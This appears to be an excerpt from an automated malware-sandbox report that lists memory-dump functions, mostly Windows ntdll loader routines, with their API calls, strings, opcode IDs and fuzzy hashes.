                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                    • String ID:
                                    • API String ID: 3231755760-0
                                    • Opcode ID: 14b00860cd93b38cd020d9d54970c92856937f214fa9e9bccdeaaf5e0bc664c8
                                    • Instruction ID: 31835f397d3bad6aebd802a71f7ccd3bac52b24c836e675622d32b9b528a64e3
                                    • Opcode Fuzzy Hash: 14b00860cd93b38cd020d9d54970c92856937f214fa9e9bccdeaaf5e0bc664c8
                                    • Instruction Fuzzy Hash: 48D0C932580104ABCF20ABE1F81CA893E28EB9431AF044420F309C2014CE714491CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • minkernel\ntdll\ldrsnap.c, xrefs: 03AD933B, 03AD9367
                                    • LdrpFindDllActivationContext, xrefs: 03AD9331, 03AD935D
                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 03AD9357
                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 03AD932A
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                    • API String ID: 0-3779518884
                                    • Opcode ID: 5e6e84f65524694d867cb5a82eca89d133de0f591d0d7a9a5fed44835cd769df
                                    • Instruction ID: 2993e5561fc1ac23576cd4acd8aa6d55ce5e53bc5744cb4be9461fc9b80d655a
                                    • Opcode Fuzzy Hash: 5e6e84f65524694d867cb5a82eca89d133de0f591d0d7a9a5fed44835cd769df
                                    • Instruction Fuzzy Hash: 7341D832A00315AEEF35EB18C969B76B7FCBB42648F0D416FD81577591E768DD808283
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D250C,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 011F3362
                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000010), ref: 011F34BF
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F34D6
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 3541575487-0
                                    • Opcode ID: e32a7d8a12cdf5c9c43104cd3e186a55b9f45ed73193197bdd66b53308640b4c
                                    • Instruction ID: ea202249c0176331835fe5eea9022bca7728bbc3396f3b1e5b8ed8b726ba87c9
                                    • Opcode Fuzzy Hash: e32a7d8a12cdf5c9c43104cd3e186a55b9f45ed73193197bdd66b53308640b4c
                                    • Instruction Fuzzy Hash: EF9105357182028BCB2DEF68C85056FB7E2FFD8244B45892DEA66C7344EB31D946C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • minkernel\ntdll\ldrsnap.c, xrefs: 03AC9C28
                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03AC9C18
                                    • LdrpDoPostSnapWork, xrefs: 03AC9C1E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                    • API String ID: 0-1948996284
                                    • Opcode ID: 417cd99acfba53c646b5bd91e0872dfca9fe7f89bcc5415b2465551d6e3e17b1
                                    • Instruction ID: fb08bbf335a5dfb0591b7bd6595f9e3314616090ef78b2a5120a7257c48f8d4e
                                    • Opcode Fuzzy Hash: 417cd99acfba53c646b5bd91e0872dfca9fe7f89bcc5415b2465551d6e3e17b1
                                    • Instruction Fuzzy Hash: 0591C271A00215AFDB18DF59C9CAABAB7BDFF45354B1840AFD806AB250D734ED01CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • minkernel\ntdll\ldrmap.c, xrefs: 03AC98A2
                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 03AC9891
                                    • LdrpCompleteMapModule, xrefs: 03AC9898
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                    • API String ID: 0-1676968949
                                    • Opcode ID: 6a23aea072d9718fa3e28ecc36487880f9affe8c42a7a3bf075fd5dfd790d045
                                    • Instruction ID: 2dce7e4970281c5d00e76cf884609f219ece19947dd78148cf1fa38446ecc052
                                    • Opcode Fuzzy Hash: 6a23aea072d9718fa3e28ecc36487880f9affe8c42a7a3bf075fd5dfd790d045
                                    • Instruction Fuzzy Hash: 9351D0356107859BEB22CB68CE84B3AB7E4BF01714F1806AFE8619B7E1D771E900CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 03A6E68C
                                    • InstallLanguageFallback, xrefs: 03A6E6DB
                                    • @, xrefs: 03A6E6C0
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                    • API String ID: 0-1757540487
                                    • Opcode ID: 18011dd209c14f8480c9a330c877c411b0a1b1fa5f05172121a409fea28371c2
                                    • Instruction ID: cc3b8f28202c96fc24f54a0ee14189b23650fbd4516a67f73d38a77afbf04677
                                    • Opcode Fuzzy Hash: 18011dd209c14f8480c9a330c877c411b0a1b1fa5f05172121a409fea28371c2
                                    • Instruction Fuzzy Hash: 4F51F67A9183459BC714DF26C540AABB3E9BF89614F09092FF985DB340F734E904C7A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,011F731D,?,?,?,?,?), ref: 011D4442
                                      • Part of subcall function 011D4476: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 011D449A
                                      • Part of subcall function 011D4476: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 011D44BE
                                      • Part of subcall function 011D4476: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011D44C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CloseOpenQueryValueVersion
                                    • String ID: %d.%d.%05d.%d
                                    • API String ID: 2996790148-3457777122
                                    • Opcode ID: ef600167d06cfe25ab7ff4e52a1cbed5010b836bb5e328bfb8af34fe956f34b7
                                    • Instruction ID: d8b87bb812f0a474e0cfd25c28be566a08f53c50b86f9a5a476e0c8d96e635ac
                                    • Opcode Fuzzy Hash: ef600167d06cfe25ab7ff4e52a1cbed5010b836bb5e328bfb8af34fe956f34b7
                                    • Instruction Fuzzy Hash: 26D02BB1B5013037D62C65AA1C5DE7B508DC6E8022744402EF80193285DBB85C1442B4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: Legacy$UEFI
                                    • API String ID: 2994545307-634100481
                                    • Opcode ID: 1e38c245e77a54f229982d62b08e97a2eb3ae79735b6dc8789905e8a286b025e
                                    • Instruction ID: b37c26b5d31a902b0ef5e0475a5faeec93a12fc206cd31a3117536dfd5850fcd
                                    • Opcode Fuzzy Hash: 1e38c245e77a54f229982d62b08e97a2eb3ae79735b6dc8789905e8a286b025e
                                    • Instruction Fuzzy Hash: B85168B1E00709AFDB24DFA8D990AAEBBF8BF49704F14442EE519EB251D771D900CB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _vswprintf_s
                                    • String ID:
                                    • API String ID: 677850445-0
                                    • Opcode ID: 1cfb72e1ff042db56d1b356458c5737033da0c3432a9fa7cb6450ef649928008
                                    • Instruction ID: 372c7faa241ce3616ee1573622f10afe17593f6a847ff67f59a0c75368e9edb1
                                    • Opcode Fuzzy Hash: 1cfb72e1ff042db56d1b356458c5737033da0c3432a9fa7cb6450ef649928008
                                    • Instruction Fuzzy Hash: 4D51F275D242A98EDF32CF69C950BBEBBB4BF08310F1442AFD859AB281D77049418B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A8B9A5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 885266447-0
                                    • Opcode ID: 7c128067c87f2bae8216b62eb0716ee8cfb8d83f8b6c5910fcada1f20506fad2
                                    • Instruction ID: 6b56b989c161d6c98db9332f261af943fad8f127480fd284750fe7c3dabd2be0
                                    • Opcode Fuzzy Hash: 7c128067c87f2bae8216b62eb0716ee8cfb8d83f8b6c5910fcada1f20506fad2
                                    • Instruction Fuzzy Hash: 00514A71608741CFC720EF29C180A2AFBF9FB88614F14496FE5968B354D771E844CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: PATH
                                    • API String ID: 0-1036084923
                                    • Opcode ID: 8a4dff06ab43131d3f827049caafccd3c90ae6f4465d6a93c7cfd172631a57b9
                                    • Instruction ID: 18f8536ddc23e80d2cca11c4fc25dad5c18369b239129f633a3bedd5213d9a52
                                    • Opcode Fuzzy Hash: 8a4dff06ab43131d3f827049caafccd3c90ae6f4465d6a93c7cfd172631a57b9
                                    • Instruction Fuzzy Hash: 98C13775E00219AFDF24DF99D981BADB7F5EF89704F08442BE911BB250E734A941CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 03ADBE0F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                    • API String ID: 0-865735534
                                    • Opcode ID: 15311a2f756669f0d35c045c703f4b6a9c7ebd4e9338143b84f3d3e78cff29df
                                    • Instruction ID: 5d334e646b7e8ac8a2eb673d53b2a78a2e1ef44391d36a81feb7091f2b53916a
                                    • Opcode Fuzzy Hash: 15311a2f756669f0d35c045c703f4b6a9c7ebd4e9338143b84f3d3e78cff29df
                                    • Instruction Fuzzy Hash: 7CA1D175B007058FEF25DF68C854B6AB3F5AB48616F0985AFE946EB780DB30D8418B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,00000006,?,011F2418), ref: 011F228B
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: DebuggerPresent
                                    • String ID:
                                    • API String ID: 1347740429-0
                                    • Opcode ID: 78b97945a7e13964da642b551f13cd405f418daaf34820872e9f42c37f347781
                                    • Instruction ID: 62bec8d4ed78aa68b2ca6a63eafb7252236bc747a1e3d5367e4f69c6b4e06c6b
                                    • Opcode Fuzzy Hash: 78b97945a7e13964da642b551f13cd405f418daaf34820872e9f42c37f347781
                                    • Instruction Fuzzy Hash: 0AF02034A0412EAB8F38DFB9B50977A3BE8AB65704B41015DE907C7145CF30E9009B92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000172C0), ref: 011E7315
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: b7cb22bbca189cae88a2d674bcad2cdad209ff327a4103c2058d88598af721dc
                                    • Instruction ID: 3ac6eef4a0fd1bf9d7958076283795cde8cc2069a6392bc08c55886776918096
                                    • Opcode Fuzzy Hash: b7cb22bbca189cae88a2d674bcad2cdad209ff327a4103c2058d88598af721dc
                                    • Instruction Fuzzy Hash: 61900260B5191186DF2867F27C1D50575E05AA96067414464F001C9048DF6041485661
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Re-Waiting
                                    • API String ID: 0-316354757
                                    • Opcode ID: d9df7ebd63db8823f04cab96bf09034740ebade47c25e3bee05a577e64251619
                                    • Instruction ID: e27cbf11f5ad6df85138d6a4f7d9deeb87a5fddfcbabf58751253f03b5abb4cf
                                    • Opcode Fuzzy Hash: d9df7ebd63db8823f04cab96bf09034740ebade47c25e3bee05a577e64251619
                                    • Instruction Fuzzy Hash: 59610471A00744EFDB25DB68C944BBEBBB9EB45714F1C4AAFE8119B2C2C73499008791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: `
                                    • API String ID: 0-2679148245
                                    • Opcode ID: 5226026d752b7aac99165940959d2802b3eeea7501ecd15df91f4abe28c15a23
                                    • Instruction ID: e55eafc6d92f3cecbbcd30ec49e8538e81f7c075ccda6c8b5e8ba678fd4e56fd
                                    • Opcode Fuzzy Hash: 5226026d752b7aac99165940959d2802b3eeea7501ecd15df91f4abe28c15a23
                                    • Instruction Fuzzy Hash: BD51BF712043519FD325EF29D980B6BB7E9EFC5208F040ABDF9969B290D731E805CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: @
                                    • API String ID: 0-2766056989
                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                    • Instruction ID: 260d87be6d43275adb15275e387056e8b67ddb2bf57b2a3956f009ce0e77cc16
                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                    • Instruction Fuzzy Hash: C1517C76504711AFD320DF19C840A6BBBF8FF48710F10892EF9959B6A0E7B4E904CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: BinaryHash
                                    • API String ID: 0-2202222882
                                    • Opcode ID: e8f0fb91c86fd76d7bf56f925a6f359d91b1549ca4f13150b05ec906294c9339
                                    • Instruction ID: cc6710006c3322849d7f492a3355ad117c280a27be009abf26077601f002206b
                                    • Opcode Fuzzy Hash: e8f0fb91c86fd76d7bf56f925a6f359d91b1549ca4f13150b05ec906294c9339
                                    • Instruction Fuzzy Hash: CA4137B690162CABDF11DB64CD80FDEB77CAB44714F0045D6A609AB280DB349E888F94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: BinaryName
                                    • API String ID: 0-215506332
                                    • Opcode ID: 08a65b0d3499c54452045e400a341f46fedf0c2c7d1ca236ffa9efe39ed4a665
                                    • Instruction ID: 082237853b6aea45cba90cb6c999e00ea1b887c4227d3bd187da97af92bd5e00
                                    • Opcode Fuzzy Hash: 08a65b0d3499c54452045e400a341f46fedf0c2c7d1ca236ffa9efe39ed4a665
                                    • Instruction Fuzzy Hash: BF31F17AD0161ABFEF15DB59C955E6FF778EF80B20F02416AA914AB380D7309E00C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: @
                                    • API String ID: 0-2766056989
                                    • Opcode ID: 69d900c1f7a1aff193f201c1e19b5d0bd02d22e794603aa71d94b9b9a97e3311
                                    • Instruction ID: 4e0d8a7094a9084ce63483409589e858ca227ca5317b79276f3e0bd32bbf8db4
                                    • Opcode Fuzzy Hash: 69d900c1f7a1aff193f201c1e19b5d0bd02d22e794603aa71d94b9b9a97e3311
                                    • Instruction Fuzzy Hash: A631C2B65083059FDB10DF29C98096BBBF8EB89654F04092FF994A7310D734DD44CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: WindowsExcludedProcs
                                    • API String ID: 0-3583428290
                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                    • Instruction ID: 72b74f02ad33cd9ebbe8661dd25a7a66dfc466743cfd6d03c0cf3e8b53c103a2
                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                    • Instruction Fuzzy Hash: 8921F237500628ABCB21DB99CD89F6BB7FDAF81A50F09446BF9049B200D635DD00DBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: Actx
                                    • API String ID: 0-89312691
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • Critical error detected %lx, xrefs: 03B18E21
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: Critical error detected %lx
                                    • API String ID: 0-802127002
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 03AFFF60
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                    • API String ID: 0-1911121157
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    • Opcode ID: ed2efd18e6b78323c5616fb654537b7bb5769ad121bc7052ae02e9908605f082
                                    • Instruction ID: f14f465d5ab863a0357ab8f26f4495cd15bba06c8e2166b368a5a9f7cc7762a8
                                    • Opcode Fuzzy Hash: ed2efd18e6b78323c5616fb654537b7bb5769ad121bc7052ae02e9908605f082
                                    • Instruction Fuzzy Hash: C731BCB1720300AFDB11EF18DEA2F29B7F9EB85718F1449ABE015DB644DB719901CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b0d5fa6cecf348fb8405fd22257bf1e4453d5987d415ba1e8ba44eaac030412
                                    • Instruction ID: ad3dd2337a02261659a377004d252709d76622832ecfeb3c6860a7a49c41df3e
                                    • Opcode Fuzzy Hash: 2b0d5fa6cecf348fb8405fd22257bf1e4453d5987d415ba1e8ba44eaac030412
                                    • Instruction Fuzzy Hash: A631C271A00659ABCF15EF65CE81ABEB7B8EF08700B14406BF805EB250E7749911CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f16bcb3f7b35fc5cc5a58dcbcd54d367091ff7e5552c1eef0cd807ce611f5a8a
                                    • Instruction ID: a72b145f82699e30513ebe322d21b880795d86e4b7db5872f57c41583327deca
                                    • Opcode Fuzzy Hash: f16bcb3f7b35fc5cc5a58dcbcd54d367091ff7e5552c1eef0cd807ce611f5a8a
                                    • Instruction Fuzzy Hash: 0B3159716053118FE724CF19C900B2AF7E5FF88B10F19496FA995AB261E7B5D8048B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e5e6b952d5af152bab2f14ff71ab62dd5b96c464ff7be2a3dd31604f5cf6355a
                                    • Instruction ID: 123ae3dbd821296f1093242beb40b258cce4b7279caa1e49d783d9b5fb7312e5
                                    • Opcode Fuzzy Hash: e5e6b952d5af152bab2f14ff71ab62dd5b96c464ff7be2a3dd31604f5cf6355a
                                    • Instruction Fuzzy Hash: E34190B1D007189EDB20CFAAD980AADFBF8FB48310F5041AFE519A7200E7745A84CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8ab76955a64ff3b4bffd83cfef3a4f8d84d6c27e8abb79c09ed717265fce39c8
                                    • Instruction ID: 48cc318aea932e4e61f64e5f0d74976f89e15f7ad7b643b1989ba0edf99dadab
                                    • Opcode Fuzzy Hash: 8ab76955a64ff3b4bffd83cfef3a4f8d84d6c27e8abb79c09ed717265fce39c8
                                    • Instruction Fuzzy Hash: 7C31E132205B14DFC761EF29CA82B2ABBA4FB88614F04456FF8564B751DBB0D900CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dab0f51501056251f4e57daeafc2034bbda491c32ca3ddacd300a0fde9e99cba
                                    • Instruction ID: 36ed85a7dddc3c47d87b69a0e5b3a14ac0fdd03aca7f23b43eb7ba6aa447494a
                                    • Opcode Fuzzy Hash: dab0f51501056251f4e57daeafc2034bbda491c32ca3ddacd300a0fde9e99cba
                                    • Instruction Fuzzy Hash: 82318F75A14249EFEB04CF58C841F96B7E4FB09314F14826BF904DB342D631E880CBA1
